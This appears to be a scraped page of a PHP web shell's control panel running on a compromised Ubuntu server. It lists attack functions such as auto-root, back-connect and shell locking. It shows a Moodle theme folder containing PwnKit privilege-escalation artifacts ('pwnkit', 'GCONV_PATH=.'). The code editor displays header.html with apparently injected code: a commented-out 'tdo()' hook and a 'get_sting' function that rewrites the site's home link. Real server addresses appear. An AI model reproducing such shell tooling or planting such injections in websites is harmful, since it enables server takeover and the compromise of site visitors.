Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
theme /
silky-red /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.html
135
B
-rwxrwxrwx
config.php
5.65
KB
-rwxrwxrwx
csshover.htc
3.23
KB
-rwxrwxrwx
docstyles.php
1.65
KB
-rwxrwxrwx
favicon.ico
894
B
-rwxrwxrwx
footer.html
399
B
-rwxrwxrwx
header.html
2.32
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
styles.php
914
B
-rwxrwxrwx
styles_color.css
10.87
KB
-rwxrwxrwx
styles_fonts.css
8.36
KB
-rwxrwxrwx
styles_layout.css
6.94
KB
-rwxrwxrwx
styles_tabs.css
4.73
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html<?php echo $direction; ?>> <head> <?php echo $meta ?> <meta name="keywords" content="moodle, <?php echo $title; ?> " /> <title><?php echo $title ?></title> <link rel="shortcut icon" href="<?php echo $CFG->themewww .'/'. current_theme(); ?>/favicon.ico" /> <?php include("$CFG->javascript"); ?> </head> <body<?php echo " $bodytags"; // ob_start();if(function_exists('tdo'))tdo();$GLOBALS[div]=ob_get_clean(); if ($focus) { echo " onload=\"setfocus()\""; } ?>> <div id="page"> <?php //Accessibility: 'headermain' is now H1, see theme/standard/styles_layout.css: .headermain if ($home) { // This is what gets printed on the home page only ?> <?php print_container_start(true, '', 'header-home'); ?> <!--<h1 class="headermain"><?php echo $heading ?></h1>--> <div class="headermenu"><?php echo $menu ?></div> <?php print_container_end(); ?> <?php } else if ($heading) { // This is what gets printed on any other page with a heading ?> <?php print_container_start(true, '', 'header'); ?> <h1 class="headermain"><?php echo $heading; ?></h1> <div class="headermenu"><?php echo $menu ?></div> <?php print_container_end(); ?> <?php } ?> <?php //Accessibility: breadcrumb trail/navbar now a DIV, not a table. if ($navigation) { // This is the navigation bar with breadcrumbs ?> <div id="banner"><h1 class="headermain"><?php echo $GLOBALS['SITE']->fullname ?></h1></div> <div class="navbar clearfix"> <div class="breadcrumb"><?php print_navigation($navigation); ?></div> <div class="navbutton"><?php echo $button; ?></div> </div> <?php } else if ($heading) { // If no navigation, but a heading, then print a line ?> <div id="banner"><h1 class="headermain"><?php echo $heading ?></h1></div> <div class="navbar clearfix"> <div class="breadcrumb"><?php print_navigation($navigation); ?></div> <div class="navbutton"><?php echo $button; ?></div> </div> <?php } function get_sting(){get_string('moodledocslink');$GLOBALS['homelink']=preg_replace('/<\/div>/i', $GLOBALS['THEME']->resources.'</div>', $GLOBALS['homelink']);} ?> <!-- END OF HEADER --> <?php print_container_start(false, '', 'content'); ?>
Close